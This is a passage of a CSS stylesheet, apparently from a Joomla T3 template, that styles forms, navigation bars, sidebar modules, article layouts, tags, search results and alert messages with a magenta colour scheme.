textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-left: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-left-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-left-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #db00af;
  border-bottom-color: #db00af;
}
.nav a:hover .caret {
  border-top-color: #8f0072;
  border-bottom-color: #8f0072;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  content: " ";
  display: table;
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: left;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
@media screen and (min-width: 768px) {
  .counter {
    float: right;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #db00af;
  border-color: #c2009b;
}
.navbar-default .navbar-text {
  color: #ffdbf8;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-left: 30px;
  }
}
.navbar-default .navbar-nav > li > a {
  color: #ffdbf8;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #c2009b;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #ffdbf8;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #c2009b;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #ffdbf8;
  border-bottom-color: #ffdbf8;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #c2009b;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #a80086;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffdbf8;
    padding: 20px 20px 20px 30px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #a80086;
    border-top: 1px solid #8f0072;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #8f0072;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-left: 40px;
  }
}
.navbar-default .navbar-link {
  color: #ffdbf8;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #c2009b;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-left: 0;
  padding-right: 0;
  float: left;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -15px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-right: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #c2009b;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  left: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  right: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  content: " ";
  display: table;
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-left: 20px;
  padding-left: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-left: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-left: 0;
  margin-left: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #c2009b;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    left: auto;
    right: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: right;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-right: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-left: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0px;
}
.module-ct .whosonline {
  margin-left: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0px;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 5px 5px 0;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: left;
  margin: 0 5px 5px 0;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #db00af;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #8f0072;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #8f0072;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-right: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #db00af;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-left: 0;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-left: 0;
  margin-right: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-right: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #db00af;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #8f0072;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align=left],
.article-intro img[align=left],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=left],
  .article-intro img[align=left],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0;
  }
}
article img[align=right],
.article-intro img[align=right],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=right],
  .article-intro img[align=right],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0;
  }
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: left;
}
.img-fulltext-right {
  float: right;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
}
.pull-right.article-image-intro img {
  margin-left: 0 !important;
  margin-right: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-left: 0;
    margin-right: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #8f0072;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-left: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
@media screen and (min-width: 768px) {
  .tag-category .filters {
    padding: 20px;
  }
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-left: 0;
  padding-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-left: 15px;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-left: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-left: 140px;
}
.registration fieldset dt {
  margin-right: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: left;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-right: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-left: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-left: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-left: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0px;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: left;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: left;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-left: 5px;
}
#searchForm:before,
#searchForm:after {
  content: " ";
  display: table;
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-left: 5px;
  padding-left: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-left: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
.filter-branch:after {
  content: "";
  clear: both;
  display: table;
}
.filter-branch .finder-selects {
  margin-right: 20px;
  margin-bottom: 20px;
}
.filter-branch .finder-selects .control-label {
  margin-bottom: 10px;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-left: 0;
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.category-item:before,
.category-item:after {
  content: " ";
  display: table;
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-left: 30px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  content: " ";
  display: table;
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-left: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: left;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-left: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 0 20px 20px;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0px;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0px;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #db00af;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #db00af;
  color: #ffffff;
}
.pagenav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.pagenav > li {
  margin: 0;
  padding: 0;
  float: left;
}
.pagenav > li.pagenav-prev,
.pagenav > li.previous {
  margin-right: 10px;
}
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
.pagenav li > a:hover,
.pagenav li > a:active,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: right;
  text-align: right;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  background-color: #f2dede;
